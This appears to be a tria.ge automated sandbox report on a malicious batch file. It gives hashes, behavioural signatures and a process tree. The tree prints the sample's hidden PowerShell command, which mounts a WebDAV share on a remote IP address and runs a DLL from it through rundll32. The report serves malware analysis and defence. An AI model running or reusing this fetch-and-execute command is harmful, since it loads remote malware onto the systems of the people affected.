Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
122s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240705-en -
resource tags
arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system -
submitted
15/07/2024, 06:05
Static task
static1
Behavioral task
behavioral1
Sample
1969732479259286114.bat
Resource
win7-20240705-en
7 signatures
150 seconds
Behavioral task
behavioral2
Sample
1969732479259286114.bat
Resource
win10v2004-20240709-en
8 signatures
150 seconds
General
-
Target
1969732479259286114.bat
-
Size
2KB
-
MD5
727e7529433f7aa759bc70a3a19526f5
-
SHA1
c9d29f4e470df3b65cd73d8dde52c4967b9a2ea9
-
SHA256
bb58d6217b5098bffcf750f1d6c51d6cf4d0d10de4df89e3e88fdb813b87f266
-
SHA512
b2873627be5e0dc32eab95978ee0590cf245ac25f4ac80b6a30e75e5c395bb23aaa9212ea0e79becf8d7363cc1dfa8ca1cde126320060126d77fe19235f4325f
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2236 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2236 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2236 powershell.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 824 wordpad.exe 824 wordpad.exe 824 wordpad.exe 824 wordpad.exe 824 wordpad.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2308 wrote to memory of 824 2308 cmd.exe 31 PID 2308 wrote to memory of 824 2308 cmd.exe 31 PID 2308 wrote to memory of 824 2308 cmd.exe 31 PID 2308 wrote to memory of 2236 2308 cmd.exe 32 PID 2308 wrote to memory of 2236 2308 cmd.exe 32 PID 2308 wrote to memory of 2236 2308 cmd.exe 32 PID 2236 wrote to memory of 2676 2236 powershell.exe 34 PID 2236 wrote to memory of 2676 2236 powershell.exe 34 PID 2236 wrote to memory of 2676 2236 powershell.exe 34 PID 2236 wrote to memory of 2532 2236 powershell.exe 35 PID 2236 wrote to memory of 2532 2236 powershell.exe 35 PID 2236 wrote to memory of 2532 2236 powershell.exe 35
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\1969732479259286114.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2308 -
C:\Program Files\Windows NT\Accessories\wordpad.exe"C:\Program Files\Windows NT\Accessories\wordpad.exe"2⤵
- Suspicious use of SetWindowsHookEx
PID:824
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -windowstyle hidden net use \\45.9.74.32@8888\davwwwroot\ ; rundll32 \\45.9.74.32@8888\davwwwroot\2811.dll,entry2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" use \\45.9.74.32@8888\davwwwroot\3⤵PID:2676
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" \\45.9.74.32@8888\davwwwroot\2811.dll entry3⤵PID:2532
-
-